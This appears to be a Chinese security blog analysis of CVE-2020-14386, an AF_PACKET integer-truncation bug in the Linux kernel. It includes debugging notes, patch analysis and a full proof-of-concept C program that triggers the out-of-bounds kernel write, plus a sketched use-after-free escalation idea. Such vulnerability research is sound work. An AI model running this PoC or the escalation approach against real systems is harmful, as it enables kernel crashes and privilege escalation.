环境搭建
(1)下载调试镜像:
sudo apt-get install debootstrap
wget https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh -O create-image.sh
chmod +x create-image.sh
./create-image.sh
(2)编译内核
(3)编译poc
wget https://raw.githubusercontent.com/cgwalters/cve-2020-14386/master/cve-cap-net-raw.c
gcc cve-cap-net-raw.c -o poc -static
(4)赋予poc CAP_NET_RAW 权限,CAP_NET_RAW权限,可以通过网络命名空间来实现,编译内核时需要开启CONFIG_USER_NS=y
# 设置 cap_net_raw 权限
setcap cap_net_raw+ep ./poc
# 查看程序的 cap 权限
getcap ./poc
# 删除 cap_net_raw 权限
setcap cap_net_raw-ep ./poc
仅做调试使用可以直接运行:
sudo ./poc skip-unshare
(5)传入qemu镜像中就可以调试
设置断点:
b tpacket_rcv
基础知识
linux 内核的内存布局
0xffffffffffffffff ---+-----------+-----------------------------------------------+-------------+
| | |+++++++++++++|
8M | | unused hole |+++++++++++++|
| | |+++++++++++++|
0xffffffffff7ff000 ---|-----------+------------| FIXADDR_TOP |--------------------|+++++++++++++|
1M | | |+++++++++++++|
0xffffffffff600000 ---+-----------+------------| VSYSCALL_ADDR |------------------|+++++++++++++|
548K | | vsyscalls |+++++++++++++|
0xffffffffff577000 ---+-----------+------------| FIXADDR_START |------------------|+++++++++++++|
5M | | hole |+++++++++++++|
0xffffffffff000000 ---+-----------+------------| MODULES_END |--------------------|+++++++++++++|
| | |+++++++++++++|
1520M | | module mapping space (MODULES_LEN) |+++++++++++++|
| | |+++++++++++++|
0xffffffffa0000000 ---+-----------+------------| MODULES_VADDR |------------------|+++++++++++++|
| | |+++++++++++++|
512M | | kernel text mapping, from phys 0 |+++++++++++++|
| | |+++++++++++++|
0xffffffff80000000 ---+-----------+------------| __START_KERNEL_map |-------------|+++++++++++++|
2G | | hole |+++++++++++++|
0xffffffff00000000 ---+-----------+-----------------------------------------------|+++++++++++++|
64G | | EFI region mapping space |+++++++++++++|
0xffffffef00000000 ---+-----------+-----------------------------------------------|+++++++++++++|
444G | | hole |+++++++++++++|
0xffffff8000000000 ---+-----------+-----------------------------------------------|+++++++++++++|
16T | | %esp fixup stacks |+++++++++++++|
0xffffff0000000000 ---+-----------+-----------------------------------------------|+++++++++++++|
3T | | hole |+++++++++++++|
0xfffffc0000000000 ---+-----------+-----------------------------------------------|+++++++++++++|
16T | | kasan shadow memory (16TB) |+++++++++++++|
0xffffec0000000000 ---+-----------+-----------------------------------------------|+++++++++++++|
1T | | hole |+++++++++++++|
0xffffeb0000000000 ---+-----------+-----------------------------------------------| kernel space|
1T | | virtual memory map for all of struct pages |+++++++++++++|
0xffffea0000000000 ---+-----------+------------| VMEMMAP_START |------------------|+++++++++++++|
1T | | hole |+++++++++++++|
0xffffe90000000000 ---+-----------+------------| VMALLOC_END |------------------|+++++++++++++|
32T | | vmalloc/ioremap (1 << VMALLOC_SIZE_TB) |+++++++++++++|
0xffffc90000000000 ---+-----------+------------| VMALLOC_START |------------------|+++++++++++++|
1T | | hole |+++++++++++++|
0xffffc80000000000 ---+-----------+-----------------------------------------------|+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
64T | | direct mapping of all phys. memory |+++++++++++++|
| | (1 << MAX_PHYSMEM_BITS) |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
0xffff880000000000 ----+-----------+-----------| __PAGE_OFFSET_BASE | -------------|+++++++++++++|
| | |+++++++++++++|
8T | | guard hole, reserved for hypervisor |+++++++++++++|
| | |+++++++++++++|
0xffff800000000000 ----+-----------+-----------------------------------------------+-------------+
|-----------| |-------------|
|-----------| hole caused by [48:63] sign extension |-------------|
|-----------| |-------------|
0x0000800000000000 ----+-----------+-----------------------------------------------+-------------+
PAGE_SIZE | | guard page |xxxxxxxxxxxxx|
0x00007ffffffff000 ----+-----------+--------------| TASK_SIZE_MAX | ---------------|xxxxxxxxxxxxx|
| | | user space |
| | |xxxxxxxxxxxxx|
| | |xxxxxxxxxxxxx|
| | |xxxxxxxxxxxxx|
128T | | different per mm |xxxxxxxxxxxxx|
| | |xxxxxxxxxxxxx|
| | |xxxxxxxxxxxxx|
| | |xxxxxxxxxxxxx|
0x0000000000000000 ----+-----------+-----------------------------------------------+-------------+
PACKET_MMAP
类型为SOCK_DGRAM/SOCK_RAW的PF_PACKET套接口,除了普通的在内核与用户层间拷贝数据包的方式外,还可通过setsockopt系统调用设置环形接收buffer,通过mmap与应用层共享这部分内存。如果通过setsockopt系统调用使能了PACKET_VNET_HDR选项,还有一个virtio_net_hdr结构,如下数据帧空间buffer中一个数据包相关的所有信息块如下:
目前TPACKET_HEADER有三个版本,每个版本的长度略有不同,用户层可使用setsockopt(PACKET_VERSION)设置需要的版本,另外也可通过getsockopt(PACKET_HDRLEN)获取到每个版本对应的头部长度,设置环形接收buffer需要此长度值。
enum tpacket_versions {
TPACKET_V1,
TPACKET_V2,
TPACKET_V3
};
对于版本1和2,不论接收还是发送的环形buffer,需要配置4个参数:分别为内存块的大小和数量、每个数据包的大小和数据包总数
struct tpacket_req {
unsigned int tp_block_size; /* Minimal size of contiguous block */
unsigned int tp_block_nr; /* Number of blocks */
unsigned int tp_frame_size; /* Size of frame */
unsigned int tp_frame_nr; /* Total number of frames */
};
上述结构定义在:/usr/include/linux/if_packet.h,构建了一个环形buffer,一个环形buffer就是一块存放数据包的内存区域。每个数据包会存放在一个单独的帧(frame)中,多个帧会被分组形成内存块(block)。每个block有 frames_per_block = tp_block_size / tp_frame_size 个frame,tp_block_nr表示block的总数,tp_frame_nr表示frame总数 。
例如:
tp_block_size= 4096
tp_frame_size= 2048
tp_block_nr = 4
tp_frame_nr = 8
得到的缓冲区结构如下图所示:
block #1 block #2
+---------+---------+ +---------+---------+
| frame 1 | frame 2 | | frame 3 | frame 4 |
+---------+---------+ +---------+---------+
block #3 block #4
+---------+---------+ +---------+---------+
| frame 5 | frame 6 | | frame 7 | frame 8 |
+---------+---------+ +---------+---------+
block 是由 pg_vec kmalloc进行动态分配的vector,block之间并不会紧邻:
static char *alloc_one_pg_vec_page(unsigned long order)
{
buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;
}
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
}
}
ring buffer是用于数据包处理的缓冲区,rx_ring 是接收数据的缓冲区,tx_ring是传输数据的缓冲区,分别可以通过setsockopt的PACKET_RX_RING和PACKET_TX_RING参数进行设置,packet_ring_buffer定义如下:
struct packet_ring_buffer {
struct pgv *pg_vec;
struct tpacket_kbdq_core prb_bdqc;
}
struct pgv {
char *buffer;
}
其中pg_vec字段为指向pgv结构体数组的一个指针,数组中的每个元素都保存了对某个内存块的引用。每个内存块实际上都是单独分配的,没有位于一个连续的内存区域中:
漏洞分析
packet_set_ring->tpacket_rcv:
漏洞代码:
static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
struct packet_type *pt, struct net_device *orig_dev)
{
// ...
if (sk->sk_type == SOCK_DGRAM) {
macoff = netoff = TPACKET_ALIGN(po->tp_hdrlen) + 16 +
po->tp_reserve;
} else {
unsigned int maclen = skb_network_offset(skb);
// tp_reserve is unsigned int, netoff is unsigned short. Addition can overflow netoff
netoff = TPACKET_ALIGN(po->tp_hdrlen +
(maclen < 16 ? 16 : maclen)) +
po->tp_reserve; // [1]
if (po->has_vnet_hdr) {
netoff += sizeof(struct virtio_net_hdr);
do_vnet = true;
}
// Attacker controls netoff and can make macoff be smaller than sizeof(struct virtio_net_hdr)
macoff = netoff - maclen; // [2]
}
// ...
// "macoff - sizeof(struct virtio_net_hdr)" can be negative, resulting in a pointer before h.raw
if (do_vnet &&
virtio_net_hdr_from_skb(skb, h.raw + macoff -
sizeof(struct virtio_net_hdr),
vio_le(), true, 0)) { // [3]
// ...
漏洞在于[1]处,netoff是 unsigned short 类型,范围为[0, 0xffff],而tp_reserve为unsigned int 类型,范围为[0, 0xffffffff],在赋值过程进行类型转化,导致高两个字节截断。所以[2]处控制netoff,使得到的macoff小于sizeof(struct virtio_net_hdr),[3]处macoff - sizeof(struct virtio_net_hdr) 为负,相当于往&h.raw 地址前面写入数据,造成向上越界写漏洞。
调试过程:
[1]处为下图中红框的执行代码:po->tp_reserve存放在$rbp+0x4e4处,赋给 esi寄存器,值为0xffb4,得到的maclen为0xe,保存在edx寄存器中,经过(maclen < 16 ? 16 : maclen)
比较值变成0x10,eax寄存器保存po->tp_hdrlen的值,为0x43,所以最后经过处理po->tp_hdrlen + (maclen < 16 ? 16 : maclen))
的值为 (0x10+0x43)&0xfffffff0=0x50,加上po->tp_reserve的值0xfffb4,得到0xfffb4+0x50=0x10004,但因为netoff是unsigned short类型,所以通过ax寄存器传递,造成了截断,此时netoff=0x4。
进入[2] 处前会进入一个判断:
if (po->has_vnet_hdr) {
netoff += sizeof(struct virtio_net_hdr);
do_vnet = true;
}
virtio_net_hdr结构大小为0xa,所以netoff变成0x4+0xa=0xe。
进入[2]处:
macoff = netoff - maclen;
macoff = 0xe - 0xe =0x0。
进入[3]处:
if (do_vnet &&
virtio_net_hdr_from_skb(skb, h.raw + macoff -
sizeof(struct virtio_net_hdr),
vio_le(), true, 0)) {
virtio_net_hdr_from_skb 函数实现如下:
static inline int virtio_net_hdr_from_skb(const struct sk_buff *skb,
struct virtio_net_hdr *hdr,
bool little_endian,
bool has_data_valid,
int vlan_hlen)
{
memset(hdr, 0, sizeof(*hdr)); /* no info leak */
if (skb_is_gso(skb)) {
struct skb_shared_info *sinfo = skb_shinfo(skb);
/* This is a hint as to how much should be linear. */
hdr->hdr_len = __cpu_to_virtio16(little_endian,
skb_headlen(skb));
hdr->gso_size = __cpu_to_virtio16(little_endian,
sinfo->gso_size);
if (sinfo->gso_type & SKB_GSO_TCPV4)
hdr->gso_type = VIRTIO_NET_HDR_GSO_TCPV4;
else if (sinfo->gso_type & SKB_GSO_TCPV6)
hdr->gso_type = VIRTIO_NET_HDR_GSO_TCPV6;
else
return -EINVAL;
if (sinfo->gso_type & SKB_GSO_TCP_ECN)
hdr->gso_type |= VIRTIO_NET_HDR_GSO_ECN;
} else
hdr->gso_type = VIRTIO_NET_HDR_GSO_NONE;
if (skb->ip_summed == CHECKSUM_PARTIAL) {
hdr->flags = VIRTIO_NET_HDR_F_NEEDS_CSUM;
hdr->csum_start = __cpu_to_virtio16(little_endian,
skb_checksum_start_offset(skb) + vlan_hlen);
hdr->csum_offset = __cpu_to_virtio16(little_endian,
skb->csum_offset);
} else if (has_data_valid &&
skb->ip_summed == CHECKSUM_UNNECESSARY) {
hdr->flags = VIRTIO_NET_HDR_F_DATA_VALID;
} /* else everything is zero */
return 0;
}
h.raw地址为0xffffc90000429000,保存在%r10寄存器,macoff经过之前的计算,值为0x0,保存在%rdx寄存器中,virtio_net_hdr结构体大小为0xa,所以经过计算传入的参数hdr = h.raw + macoff - sizeof(struct virtio_net_hdr) = (0xffffc90000429000 + 0*1)- 0xa = 0xffffc90000428ff6,因为0xffffc90000428ff6地址未被映射,无法访问,而进入virtio_net_hdr_from_skb函数后对hdr地址有个初始化操作,所以由于访问错误 do_page_fault 造成crash。
漏洞限制:
该漏洞需要程序拥有CAP_NET_RAW权限,并且只能向上越界写1~10个字节。因为越界写处: virtio_net_hdr_from_skb(skb, h.raw + macoff - sizeof(struct virtio_net_hdr), vio_le(), true, 0),要往h.raw 之前的地址写,需要加上一个负数,而macoff为unsigned short类型,最小值为0,所以最多减去一个virtio_net_hdr结构大小(为0xa个字节大小)。
Poc代码:
/* Taken from https://www.openwall.com/lists/oss-security/2020/09/03/3 */
#define _GNU_SOURCE
#include <sched.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdbool.h>
#include <stdarg.h>
#include <net/if.h>
#include <stdint.h>
#define KMALLOC_PAD 512
#define PAGEALLOC_PAD 1024
void packet_socket_rx_ring_init(int s, unsigned int block_size,
unsigned int frame_size, unsigned int block_nr) {
int v = TPACKET_V2;
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
if (rv < 0) {
perror("[-] setsockopt(PACKET_VERSION)");
exit(EXIT_FAILURE);
}
v = 1;
rv = setsockopt(s, SOL_PACKET, PACKET_VNET_HDR, &v, sizeof(v));
if (rv < 0)
{
perror("setsockopt(PACKET_VNET_HDR)\n");
return 1;
}
v = 0xffff - 20 - 0x30 -7; //0xffb4
rv = setsockopt(s, SOL_PACKET, PACKET_RESERVE, &v, sizeof(v));
if (rv < 0)
{
perror("setsockopt(PACKET_RESERVE)\n");
return 1;
}
struct tpacket_req req;
memset(&req, 0, sizeof(req));
req.tp_block_size = block_size;
req.tp_frame_size = frame_size;
req.tp_block_nr = block_nr;
req.tp_frame_nr = (block_size * block_nr) / frame_size;
rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (rv < 0) {
perror("[-] setsockopt(PACKET_RX_RING)");
exit(EXIT_FAILURE);
}
}
int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
unsigned int block_nr) {
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0) {
perror("[-] socket(AF_PACKET)");
exit(EXIT_FAILURE);
}
packet_socket_rx_ring_init(s, block_size, frame_size, block_nr);
struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_hatype = 0;
sa.sll_pkttype = 0;
sa.sll_halen = 0;
int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
if (rv < 0) {
perror("[-] bind(AF_PACKET)");
exit(EXIT_FAILURE);
}
return s;
}
// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *
int packet_sock_kmalloc() {
int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
if (s == -1) {
perror("[-] socket(SOCK_DGRAM)");
exit(EXIT_FAILURE);
}
return s;
}
void kmalloc_pad(int count) {
int i;
for (i = 0; i < count; i++)
packet_sock_kmalloc();
}
void pagealloc_pad(int count) {
packet_socket_setup(0x8000, 2048, count);
}
bool write_file(const char* file, const char* what, ...) {
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len) {
close(fd);
return false;
}
close(fd);
return true;
}
void setup_unshare() {
int real_uid = getuid();
int real_gid = getgid();
if (unshare(CLONE_NEWUSER) != 0) {
perror("[-] unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}
if (unshare(CLONE_NEWNET) != 0) {
perror("[-] unshare(CLONE_NEWNET)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/setgroups", "deny")) {
perror("[-] write_file(/proc/self/set_groups)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){
perror("[-] write_file(/proc/self/uid_map)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
perror("[-] write_file(/proc/self/gid_map)");
exit(EXIT_FAILURE);
}
}
void prep() {
cpu_set_t my_set;
CPU_ZERO(&my_set);
CPU_SET(0, &my_set);
if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
perror("[-] sched_setaffinity()");
exit(EXIT_FAILURE);
}
}
void packet_socket_send(int s, char *buffer, int size) {
struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_halen = ETH_ALEN;
if (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,
sizeof(sa)) < 0) {
perror("[-] sendto(SOCK_RAW)");
exit(EXIT_FAILURE);
}
}
void loopback_send(char *buffer, int size) {
int s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (s == -1) {
perror("[-] socket(SOCK_RAW)");
exit(EXIT_FAILURE);
}
packet_socket_send(s, buffer, size);
}
int main(int argc, char **argv)
{
int skip_unshare = 0;
struct stat stbuf;
if (argc > 1 && strcmp (argv[1], "skip-unshare") == 0)
skip_unshare = 1;
else if (stat ("/run/secrets/kubernetes.io", &stbuf) == 0)
skip_unshare = 1;
if (!skip_unshare)
setup_unshare();
prep();
packet_socket_setup(0x800000, 0x11000, 2);
uint32_t size = 0x80000/8;
char* buf = malloc(size);
if(!buf)
{
perror("malloc\n");
exit(EXIT_FAILURE);
}
memset(buf,0xce,size);
loopback_send(buf,size);
return 0;
}
栈回溯:
#0 memset_erms () at arch/x86/lib/memset_64.S:66
#1 0xffffffff831934a6 in virtio_net_hdr_from_skb
(little_endian=<optimized out>, has_data_valid=<optimized out>,
vlan_hlen=<optimized out>, hdr=<optimized out>, skb=<optimized
out>) at ./include/linux/virtio_net.h:134
#2 tpacket_rcv (skb=0xffff8881ef539940, dev=0xffff8881de534000,
pt=<optimized out>, orig_dev=<optimized out>)
at net/packet/af_packet.c:2287
#3 0xffffffff82c52e47 in dev_queue_xmit_nit (skb=0xffff8881ef5391c0,
dev=<optimized out>) at net/core/dev.c:2276
#4 0xffffffff82c5e3d4 in xmit_one (more=<optimized out>,
txq=<optimized out>, dev=<optimized out>,
skb=<optimized out>) at net/core/dev.c:3473
#5 dev_hard_start_xmit (first=0xffffc900001c0ff6, dev=0x0
<fixed_percpu_data>, txq=0xa <fixed_percpu_data+10>,
ret=<optimized out>) at net/core/dev.c:3493
#6 0xffffffff82c5fc7e in __dev_queue_xmit (skb=0xffff8881ef5391c0,
sb_dev=<optimized out>) at net/core/dev.c:4052
#7 0xffffffff831982d3 in packet_snd (len=65536, msg=<optimized out>,
sock=<optimized out>) 0001-net-packet-fix-overflow-in-tpacket_rcv
at net/packet/af_packet.c:2979
#8 packet_sendmsg (sock=<optimized out>, msg=<optimized out>,
len=65536) at net/packet/af_packet.c:3004
#9 0xffffffff82be09ed in sock_sendmsg_nosec (msg=<optimized out>,
sock=<optimized out>) at net/socket.c:652
#10 sock_sendmsg (sock=0xffff8881e8ff56c0, msg=0xffff8881de56fd88) at
net/socket.c:672
漏洞利用
该漏洞和 CVE-2017-7308 Linux Kernel packet_set_ring 整数符号错误漏洞类似,不过CVE-2017-7308是向后溢出。
利用尝试:
想要参考 CVE-2017-7308 布置堆的布局进行利用,但是packet_set_ring函数中进行了检查,为了触发漏洞,我们构造的po->tp_reserve 为0xffb4,这就造成下面【1】处最小frame的大小min_frame_size 为0xffe8,所以block的大小至少要为0x10000,这样就不能控制填充什么结构在block旁边。(这样大小的堆块不知道是通过什么vmalloc-xxx分配得到,vmalloc-xxx可以对应什么结构不清楚?)
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
……
if (req->tp_block_nr) {
unsigned int min_frame_size;
/* Sanity tests and some calculations */
err = -EBUSY;
if (unlikely(rb->pg_vec))
goto out;
switch (po->tp_version) {
case TPACKET_V1:
po->tp_hdrlen = TPACKET_HDRLEN;
break;
case TPACKET_V2:
po->tp_hdrlen = TPACKET2_HDRLEN;
break;
case TPACKET_V3:
po->tp_hdrlen = TPACKET3_HDRLEN;
break;
}
err = -EINVAL;
if (unlikely((int)req->tp_block_size <= 0))
goto out;
if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))
goto out;
min_frame_size = po->tp_hdrlen + po->tp_reserve; // <------------【1】计算min_frame_size
if (po->tp_version >= TPACKET_V3 &&
req->tp_block_size <
BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size)
goto out;
if (unlikely(req->tp_frame_size < min_frame_size)) // <-----------【2】 frame的size不能小于min_frame_size
goto out;
if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
goto out;
rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
if (unlikely(rb->frames_per_block == 0)) // <----------------【3】 block 不能小于frame
goto out;
if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))
goto out;
if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
req->tp_frame_nr))
goto out;
//分配环形缓冲区的内存块空间:
err = -ENOMEM;
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order);
packet_sock对象通过slab分配器使用kmalloc()函数进行分配。slab分配器主要用于分配比单内存页还小的那些对象
h.raw 的获得:
tpacket_rcv:
-> h.raw = packet_current_rx_frame(po, skb,TP_STATUS_KERNEL, (macoff+snaplen));
->case TPACKET_V2:
curr = packet_lookup_frame(po, &po->rx_ring, po->rx_ring.head, status);
static void *packet_lookup_frame(struct packet_sock *po,
struct packet_ring_buffer *rb,
unsigned int position,
int status)
{
unsigned int pg_vec_pos, frame_offset;
union tpacket_uhdr h;
pg_vec_pos = position / rb->frames_per_block;
frame_offset = position % rb->frames_per_block;
h.raw = rb->pg_vec[pg_vec_pos].buffer +
(frame_offset * rb->frame_size);
if (status != __packet_get_status(po, h.raw))
return NULL;
return h.raw;
}
该漏洞只能向前越界写1~10个字节,并且block只能分配大于0x10000,目前来看利用是很难的
作者利用思路:
struct sctp_shared_key {
struct list_head key_list;
struct sctp_auth_bytes *key;
refcount_t refcnt;
__u16 key_id;
__u8 deactivated;
};
作者提供的漏洞利用思路是在ring buffer前放置一个包含refcount的结构,上溢减小refcount的值,因为packet_socket_send中的memset会赋零。refcount减少,该对象会被认为被释放了,转化成UAF漏洞。
目前找到的是sctp_shared_key这个结构,占32个字节大小,通过kmalloc-32分配,因为一页的大小为4k,4k%32=0,而ring buffer分配是页对齐的,所以将sctp_shared_key 分配在页的最后。
由于结构对齐的缘故,key_id和deactivated字段各占4个字节,所以利用漏洞最多上溢refcnt 1~2个字节
另外笔者认为作者说溢出refcnt最高位两个字节是不是搞错了,还是说大端存放?那么图片中应该是refcount=10001b就说的通了。
总结:
本篇文章分析了CVE-2020-14386:Linux内核AF_PACKET权限提升漏洞的成因,对作者的漏洞利用思路进行了解读,但未实现漏洞利用,希望抛砖引玉,有大佬能实现漏洞利用,或者分享一下思路。
补丁分析
补丁将netoff 类型设置成unsigned int,赋值左右两边类型相同,不会造成整数溢出。并且检查了netoff要小于USHRT_MAX。
参考链接
https://gvisor.dev/blog/2020/09/18/containing-a-real-vulnerability/
https://www.openwall.com/lists/oss-security/2020/09/03/3
https://cert.360.cn/warning/detail?id=e73761f3747ae3b13b61b7f25a9a8e8a
https://mp.weixin.qq.com/s/uv3BiznUCUy8do_ullnXUw
https://blog.csdn.net/sinat_20184565/article/details/82788387
https://www.anquanke.com/post/id/86139
https://xz.aliyun.com/t/3455#toc-4
https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
https://github.com/bcoles/kernel-exploits/blob/master/CVE-2017-7308/poc.c
docker:https://github.com/cgwalters/cve-2020-14386
作者的漏洞分析:https://unit42.paloaltonetworks.com/cve-2020-14386/
补丁:
packet_mmap:https://elixir.bootlin.com/linux/v5.6/source/Documentation/networking/packet_mmap.txt